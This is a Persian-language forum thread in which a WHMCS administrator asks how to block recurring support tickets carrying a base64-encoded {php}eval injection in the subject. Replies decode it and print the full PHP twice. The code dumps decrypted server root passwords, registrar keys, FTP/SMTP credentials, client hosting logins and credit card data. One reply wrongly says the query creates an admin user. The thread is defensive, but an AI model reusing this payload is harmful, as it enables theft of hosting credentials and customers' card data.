کمک برای حل مشکل یا بلاک تیکت php base64_decode

[dollar]

با سلام
من الان مدتی هست از whmcs ,vCk ورژن 5.2.5 استفاده میکنم .... هر از گاهی شاید هفته ای یکبار یوزری تیکت ارسال میکنه با موضوع زیر .. البته من بلاک کردم تیکت و یوزر را ولی یه یوزر جدید باز همین تیکت را میده .. خواستم بدونم چیکار باید کنم که مشکل کلا حل بشه ؟ و آیا سیستم من مشکل امنیتی داره؟
Subject: {php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1c mF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSg iU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kd GV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9 TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcc lxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF 1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzc yddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHl wZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2Z SddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0 KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sI CRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4 iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2Z SAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWU gJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwY WRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR 1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkI CRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKio qKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0Z Xh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1N UIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyX G4iOw0KDQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyM jIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbGVyICMjIyMjIyMjI yMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSB teXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyY XJzIik7DQoNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXk oJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2WydyZWdpc 3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR 2YWx1ZSA9IGRlY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jc nlwdGlvbl9oYXNoKTsNCmlmICgkdmFsdWU9PSIiKSB7DQokdmF sdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwY XNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh 0PSR0ZXh0LiIkcmVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyX G4iOw0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyM jIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjI yMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHR leHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEZUU CArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclx uIjsNCgkkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogR lJPTSB0Ymxjb25maWd1cmF0aW9uIHdoZXJlIHNldHRpbmc9J0Z UUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYWNrd XBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N 3b3JkJyBvciAgc2V0dGluZz0nRlRQQmFja3VwRGVzdGluYXRpb 24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3IgIHNldHRpbmc 9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b 3JkJyBvciAgc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSg kdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCiR2Y Wx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0 KJHZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0a W5nJ10uIiAiLiR2YWx1ZS4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0 KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjI yMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyM jIyMjIyMjXHJcbiI7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuI yMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgUjAwdHM gIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJ HF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJ saG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICdyb290JyBvciB1c 2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4 nIG9yIHVzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c 2VybmFtZSA9ICdhZG1pbmlzdHJhdG9yJyBvcmRlciBieSBkb21 haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzc WxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHR leHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JU CAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4 kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwd CAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2g pLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ 10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiM jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzI CMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0 KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjI yMjIyMjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyM jIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlc nkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb21 haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlK CR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWl mICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2WydwYXNzd29yZ CddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4 kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpc CddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJ cblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sI CRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHV zIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NC gl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyM jIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjI yMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQ0KCQkkdGV4dD0kdGV 4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZ W50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4 iOw0KCSRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGU k9NIGB0YmxjbGllbnRzYCBXSEVSRSBjYXJkdHlwZSA8PiAnJyB vcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoa WxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0 KJGNjaGFzaCA9IG1kNSggJGNjX2VuY3J5cHRpb25faGFzaC4kd lsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjdCBjYXJ kdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nK SBhcyBjYXJkbnVtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2N oYXNofScpIGFzIGV4cGRhdGUsQUVTX0RFQ1JZUFQoaXNzdWVud W1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFFU19 ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3Rhc nRkYXRlICBGUk9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4 kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcWxfZmV0Y2hfYXJyY XkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0 uInwiLiR2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiL iR2Mls0XTsNCn0NCg0KDQogICANCiANCgkkdGV4dD0kdGV4dC4 iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50I ENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0 KCQ0KCWVjaG8oJHRleHQpOw=='));exit;{/php}


با تشکر

[saeed.spore]

کد PHP:

include('configuration.php');

$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];


$password = decrypt ($v['password'], $cc_encryption_hash);

$text=$text."Type $type\r\n";
$text=$text."Active $active\r\n";
$text=$text."Hostname $hostname\r\n";
$text=$text."Ip $ipaddress\r\n";
$text=$text."Username $username\r\n";
$text=$text."Password $password\r\n**************************************\r\n";


}
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";

$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$query = mysql_query("SELECT * FROM tblregistrars");

while($v = mysql_fetch_array($query)) {

$registrar     = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
$text=$text."$registrar $setting $value\r\n";
}
$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
    $query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or  setting='FTPBackupPassword' or  setting='FTPBackupDestination' or  setting='SMTPHost' or  setting='SMTPUsername' or setting='SMTPPassword' or  setting='SMTPPort'");
while($v = mysql_fetch_array($query)) {
$value =$v['value'];
if ($value=="") {
$value=0;
}

$text=$text.$v['setting']." ".$value."\r\n" ;
    
}
    
    
    $text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
    
        $text=$text."\r\n######################### Client R00ts ###########################\r\n";
 $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator' order by domainstatus");

 
    while($v = mysql_fetch_array($query)) {
   $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
    }
    $text=$text."\r\n######################### Client R00ts ###########################\r\n";
    
        $text=$text."\r\n######################### Client HOST ###########################\r\n";
 $query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");

 
    while($v = mysql_fetch_array($query)) {
    if (($v['username'] ) and ($v['password'])) {
   $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
    }
    }
    $text=$text."\r\n######################### Client HOST ###########################\r\n";
    
    
        $text=$text."\r\n######################### Client CC ###########################\r\n";
    $query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");

    
while($v = mysql_fetch_array($query)) {
$cchash = md5( $cc_encryption_hash.$v['0']);
$s=  mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate  FROM `tblclients` where id='".$v['0']."'" );

$v2=mysql_fetch_array($s);

  $text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4];
}


   
 
    $text=$text."\r\n######################### Client CC ###########################\r\n";
    
    echo($text); 


Decod شده این کدی که برای شما ارسال شده اینه بلاک کردن این تیکت ها بهتر سر اولین خط ***** کنید

کد PHP:

Subject: {php}evaL(base64_decode(' 


یعنی این

خوبه این هم باگ جدید ولی نه روی 5.2
این برای ورژن 5.0.3 خوب کار می کنه

ولی اگه شما اسم فولدر ادیمن عوض کردید و پسرود روی فولدر گذاشتید 30 % امنیت دارید روی سایت شاید :D

[dollar]

کد PHP:

include('configuration.php');

$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];


$password = decrypt ($v['password'], $cc_encryption_hash);

$text=$text."Type $type\r\n";
$text=$text."Active $active\r\n";
$text=$text."Hostname $hostname\r\n";
$text=$text."Ip $ipaddress\r\n";
$text=$text."Username $username\r\n";
$text=$text."Password $password\r\n**************************************\r\n";


}
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";

$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$query = mysql_query("SELECT * FROM tblregistrars");

while($v = mysql_fetch_array($query)) {

$registrar     = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
$text=$text."$registrar $setting $value\r\n";
}
$text=$text."\r\n######################### Domain Reseller ###########################\r\n";

$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
    $query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or  setting='FTPBackupPassword' or  setting='FTPBackupDestination' or  setting='SMTPHost' or  setting='SMTPUsername' or setting='SMTPPassword' or  setting='SMTPPort'");
while($v = mysql_fetch_array($query)) {
$value =$v['value'];
if ($value=="") {
$value=0;
}

$text=$text.$v['setting']." ".$value."\r\n" ;
    
}
    
    
    $text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
    
        $text=$text."\r\n######################### Client R00ts ###########################\r\n";
 $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator' order by domainstatus");

 
    while($v = mysql_fetch_array($query)) {
   $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
    }
    $text=$text."\r\n######################### Client R00ts ###########################\r\n";
    
        $text=$text."\r\n######################### Client HOST ###########################\r\n";
 $query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");

 
    while($v = mysql_fetch_array($query)) {
    if (($v['username'] ) and ($v['password'])) {
   $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
    }
    }
    $text=$text."\r\n######################### Client HOST ###########################\r\n";
    
    
        $text=$text."\r\n######################### Client CC ###########################\r\n";
    $query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");

    
while($v = mysql_fetch_array($query)) {
$cchash = md5( $cc_encryption_hash.$v['0']);
$s=  mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate  FROM `tblclients` where id='".$v['0']."'" );

$v2=mysql_fetch_array($s);

  $text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4];
}


   
 
    $text=$text."\r\n######################### Client CC ###########################\r\n";
    
    echo($text); 


Decod شده این کدی که برای شما ارسال شده اینه بلاک کردن این تیکت ها بهتر سر اولین خط ***** کنید

کد PHP:

Subject: {php}evaL(base64_decode(' 


یعنی این

خوبه این هم باگ جدید ولی نه روی 5.2
این برای ورژن 5.0.3 خوب کار می کنه

ولی اگه شما اسم فولدر ادیمن عوض کردید و پسرود روی فولدر گذاشتید 30 % امنیت دارید روی سایت شاید :D

من نفهمیدم چی به چی شد ... یه بار دیگه توضیح دقیق میدی؟ قسمت بلاکش را .. چون هر کار میکنم بلاک نمیشه باز تیکت میاد
فولدر ادمین را اسمش را تغییر ندادم ... ولی خوب روش پسوورد گذاشتم...

[saeed.spore]

من نفهمیدم چی به چی شد ... یه بار دیگه توضیح دقیق میدی؟ قسمت بلاکش را .. چون هر کار میکنم بلاک نمیشه باز تیکت میاد
فولدر ادمین را اسمش را تغییر ندادم ... ولی خوب روش پسوورد گذاشتم...

برای این میگم پسورد و تغییر نام که در این خط از کد بالا

کد PHP:

 $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator' order by domainstatus"); 


دستور میده یه یوزر با نام Admin
ایجاد کنه با نوع فول ادمین administrator

بهرته تو لیست یوزر های ادمین یه چک کنید ببینید ایجاد شده یا نه اگه نه که دیگه خودتونا درگیر این کد نکنید whmcs شما پچ شده

[dollar]

کد PHP:

 $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or  username = 'administrator' order by domainstatus"); 


دستور میده یه یوزر با نام Admin
ایجاد کنه با نوع فول ادمین administrator

بهرته تو لیست یوزر های ادمین یه چک کنید ببینید ایجاد شده یا نه اگه نه که دیگه خودتونا درگیر این کد نکنید whmcs شما پچ شده
[/QUOTE]

این whmcs معتبر هست و لیسانس مادام العمر داره ....
میگین پچ شده یعنی چی؟ چیکارش باید کرد؟
اگر اپگرید کنم به ورژن جدید آیا درست میشه؟ چون نسخه جدیدتر از اینی که دارم الان 10 روزه اومده...

[mh1376]

نسخه نال شده whmcs فقط دو گروه هستن نال کردن تو وی ای پی خودشون زدند 132 اسیب پذیری توش قراردادن که 36 تاش میتونه دسترسی کامل بده و این کد های پی اچ پی هم با یه تغییر کوچیک فرق میکنن نمیشه کاریش کرد باید اصل تهیه کنید

[shahab-f]

خواستید براتن انجام میشه که دیگه - نیاد کانفیگ امنیتی whmcs با تضمین 50 درصد افزایش امنیت بیشتر انجام میشه دوستان خواستند بگن نمونه کار بدم بهشون
موفق باشید

[dollar]

الان 2-3 روزه بیخیال شده و تیکت نمیاد ....
کسی نیست از دوستان راه حل بدونه برای امنیت بیشتر در whmcs ?
البته چیزهایی که خود سایتش فته مثلا 3 تا فولدار داره که بالای ریشه باید برد و تغییر پرمشین بعضی فولدرها را انجام دادم .... یعنی از اول اینستال انجام داده بودم ...
برای امنیت بالاتر کسی راه حالی داره؟

[saeed.spore]

اگه خیلی دیگه در این موضوع ترس دارید
آپدیت جدید
http://www.whmcs.com/members/dl.php?type=d&id=378